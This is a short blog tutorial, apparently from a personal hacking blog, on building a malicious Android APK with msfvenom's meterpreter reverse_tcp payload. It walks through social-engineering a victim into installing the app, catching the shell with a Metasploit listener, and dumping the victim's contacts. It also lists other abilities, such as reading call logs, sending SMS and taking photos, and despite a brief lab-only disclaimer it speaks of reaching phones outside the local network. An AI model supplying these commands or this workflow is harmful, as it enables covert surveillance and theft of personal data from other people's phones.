Hack android by creating a malicious apk by msfvenom:-

4 min readMar 30, 2022

Disclaimer : This is only for educational purpose do not try to hack anyone without their permission. Hacking is illegal do it in your own lab environment.

Hi,

I am Aman, in this blog we see how we can hack an android by using a malicious apk we will use msfvenom to create the payload by that payload you can dump all call logs and contact of victim, send sms form victim phone, take picture from front and rear camera, lunch any installed app,download&upload files and many more without knowing them even phone is lock. I do it on my Parrot OS oprating system but you can user other ldistro but there should be metasploit-framework installed.

— — — — — — — — — — — -let party begin — — — — — — — — — — — —

First we need create the payload that send connection back to our system form the victim phone by following command(:

$ msfvenom –p android/meterpreter/reverse_tcp LHOST=[Localhost IP] LPORT=[LocalPort] > android_hack.apk

-p : Means payload, means we are going to create a payload.
android/meterpreter/reverse_tcp : Means which type of payload.
LHOST : Means our local IP_Address.
LPORT : Means on which port the malicious apk send connection back from the victim phone.
android_hack.apk : Name of our malicious apk.

NOTE:- I am using my local IP Address because i am doing it in my own lab but you can do it globally(out of your network) by Port Forwarding we will discourse it later.

Now we got a .apk file thats our payload(fig- 3.0).

We have to install this android_hack.apk to our victim android phone here you can use social engineering techniques. I already installed it in my victim phone shown in fig-4. Take a look how its look.

Now we have to setup our listener where we make connection to victim phone for that we use metasploit for start that you can use following command(fig 5.0):

$ msfconsole

Now we will setup our listener for that you can use following command(fig 6.0):

use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST [your local IP_Address(that you use in payload) ]
set LPORT [port no:(use same port no that you use in payload) ]
exploit

Now we are good to go, now we are listening when victim click on that app we will get a meterpreter shell and now we are in the victim android phone and here we can run commands and do many stuff.lets see(fig7.0).

Here we go we found meterpreter shell now we type help command to see what options we have or which command we can execute in victim device(fig 8.0, 9.0, 10.0, 11.0)

There is lots of commands that we can use in victim phone. We can do mostly every thing in victim phone.

Lets try to dump contacts from victim phone by following command(fig 12.0):

$ dump_contacts

Here we got the all contacts that saved in victim phone into contacts_dump_20220330211251.txt file we can reed it and see all contacts with there name.